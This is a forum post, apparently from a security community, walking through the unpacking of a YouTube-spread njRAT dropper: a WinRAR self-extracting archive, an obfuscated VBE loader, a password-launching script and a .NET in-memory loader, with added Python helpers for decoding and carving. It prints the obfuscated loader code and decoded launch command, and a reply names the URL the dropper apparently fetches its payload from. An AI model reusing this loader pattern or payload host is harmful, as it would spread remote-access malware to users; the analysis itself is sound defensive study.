[ANALYSIS | UNPACKING] Firestorm - Self-extracting Archive

malware
rat
reverseengineering
analysis

#1

README

If your antivirus detects this page as malicious, it is most probably because I have pasted some scripts into the article. Do not be alarmed!

Introduction

Very recently I’ve (finally) set up a proper malware analysis VM and so I thought that it would be super fun to download some samples from malware spreaders on YouTube. I came across something interesting from which I have learned and expanded my knowledge and so I thought I’d share my analytical journey with you guys in hopes that you will also learn something!


Required Skills

Nothing extraordinary; these are entirely optional and are not needed to understand the analysis.

  • Visual Basic
  • C# .NET
  • Reverse engineering
  • Forensics
  • Persistence
  • Common sense :wink:

Analysis

Static Analysis

VirusTotal - Firestorm.exe

With all things hacking, recon should be the first step towards understanding the target. The first thing I do is upload the sample to VirusTotal (VT) to see if this has already been detected or not, or just to try and get a general overview of what I might be dealing with.

Okay, so there are some detections, but they are generic and don't really tell me much on their own.

pestudio - Firestorm.exe

Since VT wasn’t helpful, I needed to get a better understanding of what this file is and what it can do. So, using pestudio, I may be able to get some hints.

We can see here there are quite a few flags being raised, most notably:

  • it attempts to appear as a Microsoft executable IEXPLORE.exe which is Internet Explorer,
  • it seems to have another file within,
  • it references file streams so it may write to disk,
  • it references cryptographic functions, which may indicate encryption or obfuscation of embedded content,
  • the debug file name is sfxrar.pdb, which points to a self-extracting archive stub, most likely WinRAR's.

If we go into the manifest, we can see that it tells us that it’s a WinRAR SFX:

File Extraction with WinRAR - Firestorm.exe

Let’s open up this archive in WinRAR and see what it contains:

On the right-hand side, we can see the SFX script which details the path to where these files will extract, file execution after unpacking, silent install and file overwriting. Of course the file execution is what grabs our attention so let’s extract these files and have a look at them.

pestudio - sfx.exe

So the file name of sfx.exe gives us a pretty good clue as to what it might be so let’s confirm with pestudio:

Yes, as we expected. Can we extract it?

Unfortunately not. :frowning: So let’s continue with form1.vbe.

Deobfuscating Visual Basic - form1.vbe

Upon opening the file, this is what we see:

TZUO3TWPSQYCGRU="RewXŠš‚‹–ÞíÖK<m€˜«Š¡®¬ÅÈê7<UX‰œ´Ç¦½ÊÈá.PSXqt¥¸ÐãÂÙæ.GJlotozÇÒºìû.YJ{Ž¦¹˜¯¼ºÓÖBEJcf—ªÂÕ´ËØÖ9<^af‚³ÆÞñÐç><UXz}‚ÄÆÑèÈÃiy€“¦§ÄžÉºÊîA*[hwb“¡´šÍÚÄFS8iw‰p¡®À¨àéMZlT
’¡Œ½ÊàÄ?LbFy†p¦¯šÍÚÄFS8pyb›©Œ½ËÜÄ?L_Fw
”~¯½Ð¶êD*`oT
“¤Œ½ÊÙÄGS8iwŠp¡®½¨ßïUbFw„˜~¯¼Ë¶ïG*[i|b– Œ¿Î¶îE*bkT›~¯½Î¶ç>Q8iw†p¡¯Â¨ÜìT]Fw„–~¯¼Ë¶ç>T8ivŒp£²šÎÙÄ?O8ivbš§Œ½ËÝÄ?L^F~‡p¡®À¨Ùæ?*[h~b“ ¶šÎÞÄFN8iw‹p¡¯¼¨ÛèO^Fw
—~¯¼Ì¶ç@L8l|b“ ¯šËÚæMZiT‡”~±¾¨ÜëM[jTŒ–~·À¨ÝìP]Fw
’~´Á¨àèM[pTŠ›~¯½Ì¶îB*[ibš§ŒÂÓ¶ìG*]mT‡–~ ™¤íĄR<s~S^ÏßæíČÈó.iy€“¦§Ä‹–ãîÖRaJuf—ªÂÕ´ËØÖ9<^af‚³ÆÞñÐç><UXz}‚›žÏâúč6MZXqt–™žàâíĄ.)4
•œ¯ÂÒ¬×Èĉ^hsŒnÁÑØßþÆëþ`sRivt²µÃÈÃax|f¨ž™¤ñü.`oXƒt¥¸ÐãÂÙæ.GJlotÁÔìÿÞ?LJcfˆ‹©¬ÝðĈeD[hf‚¤§¬îðû\<7BºÉ‚­žáÜ÷ċ\`R
•œ¯ÂÒµºÓÖ6<WX‰œ´Ç¦ÀÓÑß.)4~•¦‚½žÉºëþ`sRl~}‚ÄͬĎĝÃ`s
f§¦ž™¤ûú.YJœ¸|¯¿ÆÙìüÞ[ESXS^©¶Ò¬×ÈØu‘¬­ÈÉäåĀĀĔĪužŸ«Æɒ‹–àô÷[eJufš®±ËÕºÓÖa`JEP¢§ÈÒ¬§²úWiJ{‹˜´¶Ð¬§²ûfamš™‚˜ÄØÛõÿ7<7B‰™¦ÂÄÞºåÖQd|n
’©¬ÎÑÖ9<m€˜«Š¡®¬ÅÈê7<UX‰œ´Ç¦½ÊÈá.PSXqt„Ñô¹üġĘoZfalµÌкñü.<7B¬ÉÐÓòõĉĖÖrŽR¦»}‚}ˆÿČÈó._rŠ|Ð姙¤ČĨ.YJ«¸alµÌкîċ\_~•¢‚}ˆ™¤" : PZUO3TWPSQYCGRU="ZUO3TWPSQYCGRU" : CZUO3TWPSQYCGRU=len(PZUO3TWPSQYCGRU) : do until NZUO3TWPSQYCGRU=len(TZUO3TWPSQYCGRU) : NZUO3TWPSQYCGRU=NZUO3TWPSQYCGRU+1 : UZUO3TWPSQYCGRU=UZUO3TWPSQYCGRU+1 : if UZUO3TWPSQYCGRU=len(PZUO3TWPSQYCGRU) then UZUO3TWPSQYCGRU=1
WZUO3TWPSQYCGRU=WZUO3TWPSQYCGRU & ChrW(AscW(Mid(TZUO3TWPSQYCGRU, NZUO3TWPSQYCGRU, 1)) - UZUO3TWPSQYCGRU * CZUO3TWPSQYCGRU) : loop : execute WZUO3TWPSQYCGRU

and what a mess it is. Obfuscation of scripts is very common, so this should not come as a surprise. Looking past the noise, the structure is simple: one long string of high-codepoint characters (TZUO3TWPSQYCGRU), a short key string, and a loop that walks the blob one character at a time, subtracts a rolling offset from each character code (a counter that cycles from 1 up to one less than the key length, multiplied by the key length), appends the result to WZUO3TWPSQYCGRU and finally hands that string to execute. So the big string almost certainly holds another payload, but reversing the loop by hand would take some time, especially for people like me who are not that familiar with Visual Basic.

What's a simple way to continue without too much effort? At the end of the script there is an execute call on the WZUO3TWPSQYCGRU variable, i.e. the decoded text is run as VBScript. So let's be smart here: instead of letting it execute, we make the script print the decoded text. Replace execute with WScript.Echo and run the file with cscript.exe (important! under wscript.exe, the default host, Echo pops up a message box instead of writing to the console). Here is the output:

(The following script has sections removed to prevent AV detection)

DIM DF
MOHMRET = "83101116328711510483104101108108326132878399114105112116466711410197116101799810610199116403487839911410511211646831041011081083441131087115104831041011081084682117110323411510212-04610112010132324511284945643110658211869112841198769693534"
END IF
mohar = MOHMRET
MOHMRT = SPLIT(mohar,CHRW(10 + 4)) 
END IF
EXECUTE (FLAMI) 
END IF  

Yes, indeed it is another payload. Again it is obfuscated, but this time it makes a bit more sense. The MOHMRET variable holds yet another payload: a run of decimal character codes (the opening 83 101 116 32 spells "Set ") with a separator character woven in between them. The Split call on mohar (a copy of MOHMRET) using CHRW(10 + 4), i.e. ChrW(14), confirms that: the string is split on that non-printable separator, and the remaining code presumably turns each code back into a character before handing the result to EXECUTE.

Instead of deobfuscating this file, we want to be smart so similar to the previous script, let’s replace execute with WScript.Echo and see what we get:

Microsoft (R) Windows Script Host Version 5.8
Copyright (C) Microsoft Corporation. All rights reserved.

Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "sfx.exe  -pT^8+nARvEpTwWEE#"

There is no more obfuscation, and we can see a reference to sfx.exe. The script runs the other file from the command line with what is most likely the password to the archive: a quick Google search shows that WinRAR takes -p<password> (no space) as the archive password switch. With that, we have unlocked a piece of the puzzle.
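The two unwrapping steps above are small enough to reimplement outside Windows Script Host, which is handy when you would rather not run the sample at all. The following is an added example and not code from the original post: it replicates the stage-1 loop (including its counter that wraps to 1 and so never uses the offset 14), splits the stage-2 digit string on ChrW(14), and pulls the WinRAR password out of the recovered WshShell.Run line. Because the blob pasted in the post lost characters and line breaks, the sample input is constructed here with the matching encoders; only the final two-line script is taken from the page.

```python
import re

KEY_NAME = "ZUO3TWPSQYCGRU"   # the PZUO3TWPSQYCGRU literal; only its length (14) matters
SEP = chr(10 + 4)             # ChrW(10 + 4) from the stage-2 Split call


def _offsets(key_len):
    """Replicates the script's U counter: it increments on every character and
    wraps back to 1 when it reaches len(key), so it only ever takes 1..len-1."""
    u = 0
    while True:
        u += 1
        if u == key_len:
            u = 1
        yield u


def decode_stage1(blob, key_len=len(KEY_NAME)):
    """ChrW(AscW(c) - U * C) for every character, exactly as the loop does."""
    offs = _offsets(key_len)
    return "".join(chr(ord(c) - next(offs) * key_len) for c in blob)


def encode_stage1(plain, key_len=len(KEY_NAME)):
    """Inverse of decode_stage1; used here only to build a sample blob."""
    offs = _offsets(key_len)
    return "".join(chr(ord(c) + next(offs) * key_len) for c in plain)


def decode_stage2(codes, sep=SEP):
    """Split on the ChrW(14) separator and turn each decimal code into a character."""
    return "".join(chr(int(tok)) for tok in codes.split(sep) if tok)


def encode_stage2(plain, sep=SEP):
    """Inverse of decode_stage2; used here only to build a sample."""
    return sep.join(str(ord(c)) for c in plain)


def unwrap(stage1_blob):
    """Walk the whole chain: stage-1 blob -> stage-2 script -> final VBScript
    -> Run command line -> WinRAR -p password."""
    stage2_script = decode_stage1(stage1_blob)
    lit = re.search(r'MOHMRET\s*=\s*"([^"]*)"', stage2_script)
    if not lit:
        raise ValueError("MOHMRET literal not found in stage 2")
    final_script = decode_stage2(lit.group(1))
    cmd = re.search(r'\.Run\s+"([^"]*)"', final_script)
    if not cmd:
        raise ValueError("no WshShell.Run call in the final script")
    pw = re.search(r'(?:^|\s)-p(\S+)', cmd.group(1))
    return {
        "final_script": final_script,
        "command": cmd.group(1),
        "password": pw.group(1) if pw else None,
    }


# Constructed sample: the final script is the one recovered in the post; the two
# wrapping layers are rebuilt with the encoders above (the pasted blob is damaged).
FINAL_SCRIPT = (
    'Set WshShell = WScript.CreateObject("WScript.Shell")\r\n'
    'WshShell.Run "sfx.exe  -pT^8+nARvEpTwWEE#"'
)
STAGE2_SCRIPT = 'MOHMRET = "%s"\r\nEXECUTE (FLAMI)' % encode_stage2(FINAL_SCRIPT)
SAMPLE_BLOB = encode_stage1(STAGE2_SCRIPT)

if __name__ == "__main__":
    result = unwrap(SAMPLE_BLOB)
    print(result["final_script"])
    print("password:", result["password"])
```

Feed unwrap() the real TZUO3TWPSQYCGRU string (copied out of the .vbe as text, not from a rendered page) and it returns the same command line and password the Echo trick produced, without ever executing the script.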

With the password, sfx.exe opens, and here we have yet another auto-run executable called eze.exe. Let's extract it and perform some more analysis.

pestudio - eze.exe

Looking at the indicators in pestudio, we can see that it again dresses itself up to look like a Microsoft executable. We can also see that it is likely a .NET file, and the original file name WindowsFormsApp1.exe is the default name Visual Studio gives a new C# Windows Forms project, so the author probably never bothered to rename it.

Moving onto the VT indicators (the sample must already exist on VT), we can see that it may be a dropper:

Let's take a look at the strings, since they might give us the file names or locations of whatever it drops:

And quite some interesting strings we have here. Greetings, Mr. Stan! If you are reading this, you are violating rule number 5 of the CIA’s Development Tradecrafts DOs and DON’Ts. Here’s the link, just for you! :wink: Don’t be surprised if cops show up at the front of your door! :astonished:

We can confirm the project development under Visual Studio 2017 as we suspected from the default project name. The string that is listed after looks like it may be the location from where the dropper obtains its payload. If we navigate to the page, we get an error:

So either the file has since been taken down, or it was never a PNG (or any other image) to begin with and the extension is just a disguise for whatever the dropper fetches.

Dynamic Analysis

dnSpy - eze.exe

We would love to see the file that is dropped by this file and of course it can easily be obtained just by downloading the file but just to spice things up, let’s look at how we can get it via dynamic analysis. Open up eze.exe in dnSpy and let’s see what it does.

In the red box, we can see a call to Assembly.Load. Given a byte array, it loads a .NET assembly straight from memory without ever writing it to disk, which is why it is so common in droppers and crypters; the EntryPoint.Invoke call right after it then runs that assembly. For an example of this, see @TheDoctor's [C#] A Simple Runtime Crypter article.

To get the binary file, we simply place a breakpoint on this line and run it until it gets hit (mind the sleep at the beginning!)…

… look in the variable’s (array) memory (right-click the variable in the Locals tab at the bottom, select Show in Memory Window and then choose a memory view)…

… and there lies the binary we were looking for! Identify the MZ magic and the PE\0\0 signatures to verify. Right-click the memory and select Save Selection....
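Checking the MZ and PE\0\0 signatures by eye works, but a saved memory selection often carries leading garbage and stray "MZ" byte pairs, and it is worth confirming that what you carved is really a managed image before sending it anywhere. The block below is an added example (not code from the original post): it locates every MZ header whose e_lfanew actually lands on a PE signature, parses the COFF and optional headers, and reports whether data directory 14 (the CLR runtime header) is populated, which is what makes the blob a .NET assembly suitable for Assembly.Load. The sample dump is constructed inline from a header-only synthetic PE32, and the e_lfanew plausibility window is a heuristic of this example, not part of the PE specification.

```python
import struct

IMAGE_FILE_DLL = 0x2000
CLR_DIRECTORY_INDEX = 14   # IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR


def find_pe_images(blob):
    """Offsets of every 'MZ' whose e_lfanew really points at a 'PE\\0\\0' signature.
    Stray 'MZ' byte pairs in the dump fail that second check and are skipped."""
    hits = []
    pos = blob.find(b"MZ")
    while pos != -1:
        if pos + 0x40 <= len(blob):
            e_lfanew = struct.unpack_from("<I", blob, pos + 0x3C)[0]
            sig = pos + e_lfanew
            # Plausibility window for e_lfanew (heuristic, not from the PE spec).
            if 0x40 <= e_lfanew < 0x1000 and blob[sig:sig + 4] == b"PE\0\0":
                hits.append(pos)
        pos = blob.find(b"MZ", pos + 1)
    return hits


def describe_pe(image):
    """Parse the headers of a carved image and report what kind of PE it is."""
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    coff = e_lfanew + 4
    machine, nsections, _, _, _, _opt_size, chars = struct.unpack_from("<HHIIIHH", image, coff)
    opt = coff + 20
    magic = struct.unpack_from("<H", image, opt)[0]
    if magic == 0x10B:      # PE32: data directories start at optional header + 96
        dirs = opt + 96
    elif magic == 0x20B:    # PE32+: data directories start at optional header + 112
        dirs = opt + 112
    else:
        raise ValueError("unexpected optional header magic 0x%x" % magic)
    size_of_image = struct.unpack_from("<I", image, opt + 56)[0]  # same offset in both formats
    num_dirs = struct.unpack_from("<I", image, dirs - 4)[0]       # NumberOfRvaAndSizes
    clr_rva = 0
    if num_dirs > CLR_DIRECTORY_INDEX:
        clr_rva, _ = struct.unpack_from("<II", image, dirs + CLR_DIRECTORY_INDEX * 8)
    return {
        "machine": machine,
        "sections": nsections,
        "pe32plus": magic == 0x20B,
        "is_dll": bool(chars & IMAGE_FILE_DLL),
        "size_of_image": size_of_image,     # in-memory extent, useful for sizing the carve
        "managed": clr_rva != 0,            # non-zero CLR header RVA => .NET assembly
    }


def carve(blob):
    """(offset, description) for every valid PE image found in the dump."""
    return [(off, describe_pe(blob[off:])) for off in find_pe_images(blob)]


def _synthetic_pe32(managed=True):
    """Header-only PE32 image (constructed sample; it has no real code or sections)."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                             # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 224, 0x0102)      # i386, EXECUTABLE|32BIT
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                               # PE32 magic
    struct.pack_into("<I", opt, 56, 0x6000)                             # SizeOfImage
    struct.pack_into("<I", opt, 92, 16)                                 # NumberOfRvaAndSizes
    if managed:
        struct.pack_into("<II", opt, 96 + CLR_DIRECTORY_INDEX * 8, 0x2008, 0x48)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt)


# Constructed stand-in for a memory-window dump: padding, a stray "MZ" that is
# not a header, then the synthetic managed image at offset 64.
SAMPLE_DUMP = b"\x00" * 16 + b"MZ" + b"\x00" * 46 + _synthetic_pe32(managed=True)

if __name__ == "__main__":
    for off, info in carve(SAMPLE_DUMP):
        print("PE at 0x%x: %s" % (off, info))
```

Run carve() over the bytes you saved from the memory window; a result whose managed flag is False means the selection is not the .NET payload Assembly.Load was handed, and you probably started the selection at the wrong "MZ".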

Let’s see what VT has for us.

55/67 detections! Identified as Bladabindi AKA njRAT.

Conclusions

I hope this was an entertaining and educational read! Thanks for stopping by!

EDIT:
The sample can now be obtained here:

https://www.hybrid-analysis.com/sample/6fed01e33311f0b0d25a894efdfa3412d00f40fbb0c5f0ba303a2c41c4dbd31f?environmentId=100

– dtm


(oaktree) #2

So you found this program somewhere on YouTube?


#3

Let’s make a CTF about how many YouTube keyloggers you can take over


#4

Yep, actually not a bad place to find some wild malwarez.


#5

Could you share the sample possibly?


#6

The sample should be downloadable via Hybrid Analysis. The link is provided at the bottom of the article.


(DamaneDz) #7

Nice analysis

I have just one addition about the image url

http://iupcloud.com/uploads/up669851510864553_ha.png


#8
